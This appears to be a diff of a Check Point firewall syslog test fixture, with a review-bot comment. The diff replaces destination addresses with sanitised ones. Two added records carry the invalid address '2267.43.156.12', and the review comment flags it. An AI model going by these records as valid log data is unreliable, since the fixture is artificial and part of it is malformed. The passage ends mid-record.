 <134>1 2020-03-29T16:54:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2be,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34352"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43489"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:54:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2be,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39243"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:54:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2be,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53636"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26808"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60576"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59345"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59225"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c6,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500870"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47185"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60576"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59345"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59225"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c6,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500870"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47185"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:54:31Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2c7,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:54:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2cf,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500879"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2cf,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500879"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58281"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2cf,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500879"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2cf,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500879"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58281"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:54:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2dd,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"]
 <134>1 2020-03-29T16:55:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d319,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50047"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:55:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d319,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50048"; service:"443"; service_id:"https"; src:"192.168.1.117"]
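Review bot: The `dst` value `2267.43.156.12` that the same address-sanitisation pass writes into two added lines of the following hunk (`@@ -1546,165 +1546,165 @@`, the records that previously carried `224.0.0.1`) is not a valid IPv4 address, since the first octet exceeds 255; the replacements in this hunk (`8.8.8.8` → `175.16.199.1`) are well-formed. If the module's pipeline maps `dst` into an `ip`-typed field, those two records will fail conversion at ingest, and if the expected-output files are regenerated from this fixture the malformed value gets pinned as the golden result, so I would correct them to an address from the same range as the rest of the fixture before merging. As a smaller point of style, `175.16.199.1` is a routable public address rather than one from the RFC 5737 documentation ranges (`192.0.2.0/24`, `198.51.100.0/24`, `203.0.113.0/24`); if the project deliberately uses it for geo-enrichment tests that is fine, otherwise the documentation ranges keep replayed fixtures from pointing at real hosts.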
@@ -1546,165 +1546,165 @@ <134>1 2020-03-29T16:56:06Z gw-da58d3 CheckPoint 1930 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d328,0x0,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"67"; service:"68"; service_id:"dhcp-rep-localmodule"; src:"192.168.0.254"] <134>1 2020-03-29T16:56:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"] <134>1 2020-03-29T16:56:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.196"] -<134>1 2020-03-29T16:56:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] -<134>1 2020-03-29T16:56:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"] +<134>1 2020-03-29T16:56:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; 
flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] +<134>1 2020-03-29T16:56:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"] <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59196"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60068"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26809"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45930"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; 
